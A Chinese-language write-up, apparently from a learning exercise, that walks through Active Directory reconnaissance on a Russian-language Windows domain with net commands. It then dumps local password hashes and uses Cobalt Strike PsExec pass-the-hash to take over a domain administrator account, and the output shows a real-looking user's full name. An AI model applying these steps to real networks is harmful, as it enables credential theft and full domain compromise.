一次获得域管的过程记录

一次获得域管的过程记录

最近在学习内网渗透,这只是一次模拟测试,记录一下过程。前面的过程就不描述了,从CMD shell开始。

过程

Command : net view /domain

查看域

Домен

-------------------------------------------------------------------------------
DI****                 
Команда выполнена успешно.

Command : net group /domain

查看域中的用户组

.....省略
*none
*RTCDomainServerAdmins
*RTCUniversalServerAdmins
*Администраторы домена
*Администраторы предприятия
*Администраторы схемы
*Владельцы-создатели групповой политики
*Гости домена
*Издатели сертификатов
*Компьютеры домена
*Контроллеры домена
*Контроллеры домена - только чтение
*Контроллеры домена предприятия - только чтение
*Пользователи домена
Команда выполнена успешно.

根据上面的命令中获得域下的所有用户组,发现用户组名为 “Администраторы домена” 是域管用户组,通过这个用户组查看域管成员

Command : net group “Администраторы домена” /domain

Этот запрос будет обрабатываться контроллером домена DI****.local.

Имя группы      Администраторы домена
Комментарий     Назначенные администраторы домена

Члены

-------------------------------------------------------------------------------
d2                       d3                       it***                
refugee                  Администратор            
Команда выполнена успешно.

获得域管用户:d2、d3、it***、refugee、Администратор

Command : net user d2 /domain

查看d2用户的信息

Имя пользователя                       d2
Полное имя                             Дмитрий Соловьёв
Комментарий                            
Комментарий пользователя               
Код страны                             000 (Стандартный системный)
Учетная запись активна                 Yes
Учетная запись просрочена              Никогда

Последний пароль задан                 22.03.2017 10:22:50
Действие пароля завершается            Никогда
Пароль допускает изменение             22.03.2017 10:22:50
Требуется пароль                       Yes
Пользователь может изменить пароль     Yes

Разрешенные рабочие станции            Все
Сценарий входа                         
Конфигурация пользователя              
Основной каталог                       
Последний вход                         23.10.2018 20:14:58

Разрешенные часы входа                 Все

Command : net accounts /domain

获取域密码策略,密码长短,错误锁定 等信息

Этот запрос будет обрабатываться контроллером домена DI****.local.

Принудительный выход по истечении времени через:             Никогда
Минимальный срок действия пароля (дней):                     0
Максимальный срок действия пароля (дней):                    Без ограничений
Минимальная длина пароля:                                    0
Хранение неповторяющихся паролей:                            Нет
Блокировка после ошибок ввода пароля:                        Никогда
Длительность блокировки (минут):                             Никогда
Сброс счетчика блокировок через (минут):                     30
Роль компьютера:                                             ОСНОВНОЙ
Команда выполнена успешно.

Command : net user

获取当前用户列表

Учетные записи пользователей для \\M040-SQL

-------------------------------------------------------------------------------
****                    ****                   Администратор            
Гость                    
Команда выполнена успешно.

注意到上面列表中 Администратор 在域控用户组中(运气爆表~)

使用hashdump获得hash:

****:1009:aad3b435b51404eeaad3b435b51404ee::******::::::
****:1011:aad3b435b51404eeaad3b435b51404ee::******::::::
Администратор:500:aad3b435b51404eeaad3b435b51404ee:******:::
Гость:501:aad3b435b51404eeaad3b435b51404ee::******::::::

使用Cobalt Strike的PsExec进行hash传递攻击,弹回来一个Администратор用户的会话,成功获得域管:

Этот запрос будет обрабатываться контроллером домена DI****.local.

Имя пользователя                       Администратор
Полное имя                             
Комментарий                            Встроенная учетная запись администратора компьютера/домена
Комментарий пользователя               
Код страны                             000 (Стандартный системный)
Учетная запись активна                 No
Учетная запись просрочена              Никогда

Последний пароль задан                 22.03.2017 9:27:50
Действие пароля завершается            Никогда
Пароль допускает изменение             22.03.2017 9:27:50
Требуется пароль                       Yes
Пользователь может изменить пароль     Yes

Разрешенные рабочие станции            Все
Сценарий входа                         
Конфигурация пользователя              
Основной каталог                       
Последний вход                         Никогда

Разрешенные часы входа                 Все


Членство в локальных группах           *_****_         
                                       *Администраторы       

Членство в глобальных группах          *Пользователи домена  
                                       *Администраторы предпр //域管理员
                                       *Администраторы домена
                                       *Администраторы схемы 
                                       *Владельцы-создатели г
Команда выполнена успешно.

简单的结束了。。